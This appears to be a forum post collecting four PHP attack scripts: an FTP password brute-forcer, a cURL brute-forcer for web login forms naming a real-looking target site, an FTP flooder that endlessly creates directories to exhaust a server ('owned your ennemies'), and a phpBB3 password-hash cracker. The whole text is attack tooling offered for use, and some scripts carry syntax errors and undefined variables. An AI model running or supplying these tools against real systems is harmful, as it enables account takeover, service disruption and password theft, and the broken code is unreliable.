Simple FTP Brute-Force

Код:
<?php 
$sito = $argv[1]; 
$username = $argv[2]; 
$lista = $argv[3]; 
  
if((isset($sito)) AND (isset($lista)) AND (isset($username))){ 
  
if (file_exists($lista)){ 
  
$lista = file($lista); 
$connessione = ftp_connect($sito) or die("Impossibile stabilire una connessione a $sito"); 
  
foreach($lista as $passwd){ 
  
if(@ftp_login($connessione, $username, $passwd)){ 
die("\t[Successo] - $passwd"); 
} else { 
print "[Fallito] - $passwd\n"; 
} 
  
} 
  
ftp_close($connessione); 
} else 
die("Lista per il brute force assente"); 
  
} else 
die("Uso: php <file>.php <sito> <username> <list>\nEsempio: php brute.php ftp.google.it admin /root/list.txt"); 
?>

cURL Bruteforcer Password

Код:
<?php 
// configure the bruter with your scenario 
$target = "http://www.httpscript.com/login.php"; // your target. 
$user = "admin"; // the user we are bruting 
$user_field = "user_name"; // the username field name in form 
$pass_field = "password"; // the password field name in form 
$bad = "Wrong username or password"; // message if the user / pass was wrong 
$list = "path_to_word_list"; // the path to your wordlist 


// Set the time limit of executing the script to 0 - never 
set_time_limit(0); 

// star the normal cURL routine 
$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, $target); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 
curl_setopt($ch, CURLOPT_POST, 1); 

// The actual bruting process 
foreach(file($list) as $line) 
{ 
$word = str_replace(array(" 
", " 
"), , $line); 
$postfields = "".user_field."=".$username."&".$pass_field."=".$word.""; 
curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields); 
$res = curl_exec($ch); 
if(!eregi($bad,$res)) 
{ 
die("Pass found, it is: {$word}"); // password found 
} 

} 

// close cURL connection 
curl_close($ch); 

?>

FTP Flooder

Код:
<?php 
############################################### 
#owned your ennemies. 
############################################### 
set_time_limit(0); ## << We NEED that. 

    function swrite($conn,$out){ 
        echo "<font color='blue'> < $out </font><br>"; 
        fputs($conn,"$out\n"); 
    } 
    function sreadline($conn){ 
        $in = fgets($conn);         
        if($in == '') 
            echo "<font color='red'> > No Responce </font><br>"; 
        else 
            echo "<font color='green'> > $in </font><br>"; 
        return $in; 
    } 
    function sread($conn){ 
        while(true){ 
            $line = fgets($conn); 
            $s .= $line; 
            if($line =='') 
                break; 
        } 
        return $s; 
    } 
     
    $host = 'localhost'; 
    $user = 'anonymous'; 
    $pass = 'blablabla'
     
# Connect. 
    $control = fsockopen($host,21,$errno,$errstr,30); 
    if(!$control) 
        die("ERROR: $errno ($errstr) "); 
    sreadline($control); 
     
# Login. 
    swrite($control, "USER $user"); 
    sreadline($control); 
    swrite($control, "PASS $pass"); 
    $message = explode(' ',sreadline($control),2); 

    if( $message[0] == 530 ) 
        die(); 
         
# Enter Type A 
    swrite($control, "TYPE A"); 
    sreadline($control); 
     
# Passive Mode FTW 
    swrite($control, "PASV"); 

$x = 1; 
while(1) 
{ 
     swrite($control,"MKD /upload/DaaaaarkMiiiiiiiiiiiiiiiiindZ". $x ." "); ## make sure you write to a writeable dir... 
     sreadline($control); 

$x++; 
} 
# kthxbai! 
?>

PhpBB3 Hash Bruteforce

Код:
#!/usr/bin/php  
<?php  
set_time_limit(0);  
   
echo "///////////////////////////////////////////////\r\n";  
echo "//         PHPBB3 Bruteforce             //\r\n";  
echo "//  Original bruteforce script by Tux      //\r\n";  
echo "//     Moded for Phpbb3 by Jeforce     //\r\n";  
echo "//     http://www.jeforce.net            //\r\n";  
echo "////////////////////////////////////////////\r\n";  
   
if ($argc<2 || $argv[1]=='--help') {  
    echo<<<END  
USAGE: {$argv[0]} 'hash' chars  
    - hash        : The hash to crack  
    - chars        : Max length string to attempt to crack  
   
HELP: {$argv[0]} --help  
   
   
END;  
    exit;  
}  
//Fonction PHPBB3  
   
function _hash_crypt_private($password, $setting, &$itoa64)  
{  
$output = '*';  
// Check for correct hash  
if (substr($setting, 0, 3) != '$H$')  
{return $output;}  
   
$count_log2 = strpos($itoa64, $setting[3]);  
if ($count_log2 < 7 || $count_log2 > 30)  
{return $output;}  
$count = 1 << $count_log2;  
$salt = substr($setting, 4, 8);  
if (strlen($salt) != 8)  
{return $output;}  
   
$hash = pack('H*', md5($salt . $password));  
do  
{  
$hash = pack('H*', md5($hash . $password));  
}  
while (--$count);  
$output = substr($setting, 0, 12);  
$output .= _hash_encode64($hash, 16, $itoa64);  
return $output;  
}  
function _hash_gensalt_private($input, &$itoa64, $iteration_count_log2 = 6)  
{  
if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31)  
{$iteration_count_log2 = 8;}  
$output = '$H$';  
$output .= $itoa64[min($iteration_count_log2 + ((PHP_VERSION >= 5) ? 5 : 3), 30)];  
$output .= _hash_encode64($input, 6, $itoa64);  
return $output;  
}  
   
/**  
* Encode hash  
*/  
function _hash_encode64($input, $count, &$itoa64)  
{  
$output = '';  
$i = 0;  
do  
{  
$value = ord($input[$i++]);  
$output .= $itoa64[$value & 0x3f];  
if ($i < $count)  
{$value |= ord($input[$i]) << 8;}  
$output .= $itoa64[($value >> 6) & 0x3f];  
if ($i++ >= $count)  
{break;}  
if ($i < $count)  
{$value |= ord($input[$i]) << 16;}  
$output .= $itoa64[($value >> 12) & 0x3f];  
if ($i++ >= $count)  
{break;}  
$output .= $itoa64[($value >> 18) & 0x3f];  
}  
while ($i < $count);  
return $output;  
}  
function phpbb_check_hash($password, $hash)  
{  
$itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';  
if (strlen($hash) == 34)  
{  
return (_hash_crypt_private($password, $hash, $itoa64) === $hash) ? true : false;  
}  
return (md5($password) === $hash) ? true : false;  
}  
   
//if(isset($argv[4])) $charset=$argv[4];  
//else $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';  
   
$charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';  
$charset_beginning = $charset{0};  
$charset_end = $charset{strlen($charset)-1};  
   
//$HASH = '$H$99i1.eNyzhGdi5/lAnKnSjU8iIABC80';  
// $SIZE = (int) $_GET['chars'];  
$HASH = $argv[1];  
$SIZE = (int) $argv[2];  
   
$start = time()-1;  
$curtotal=0;  
$total=0;  
for($i=$SIZE; $i>0; $i--) $total+=pow(strlen($charset), $i);  
$split=ceil(($total/strlen($charset))/5);  
   
   
echo " *** MAX SIZE: $SIZE, cracking HASH: $HASH\r\n";  
echo " *** TOTAL KEYS: $total\r\n";  
echo " *** CHARSET: $charset\r\n";  
   
for($i=1; $i<=$SIZE; $i++) {  
    $keyspace = pow(strlen($charset), $i);  
    echo "\r\nAttempting to crack with $i characters.\r\n";  
    echo " *** Total combinations: $keyspace\r\n";  
   
    $key = '';  
    for ($y=0; $y<$i; $y++) $key .= $charset_beginning;  
   
    for ($x=0; $x<$keyspace+1; $x++) {  
        $curtotal++;  
   
        if (phpbb_check_hash($key, $HASH)) {  
            $time=(time()-$start);  
            echo<<<END  
   
Successfully key cracked after $time seconds. The cracker searched a total  
of $curtotal keys out of a possible $total in $time seconds.  
   
Found the clear text of '$HASH' is '$key'.\n  
END;  
            exit;  
        }  
   
        if($x%$split == 0) {  
            $rate=ceil($curtotal/(time()-$start));  
            echo " ... $curtotal/$total ($key) [$rate Keys/second]\r\n";  
        }  
   
        for ($y=0; $y<$i; $y++) {  
            if ($key[$y] != $charset_end) {  
                $key[$y] = $charset{strpos($charset, $key[$y])+1};  
   
                if ($y > 0)  for ($z = 0; $z < $y; $z++) $key[$z] = $charset_beginning;  
                break;  
            }  
        }  
    }  
}  
$time=time()-$start;  
echo<<<END  
*** SORRY NO MATCHS FOUND  
    Time running : $time. Keys searched : $total.\n  
END;  
?>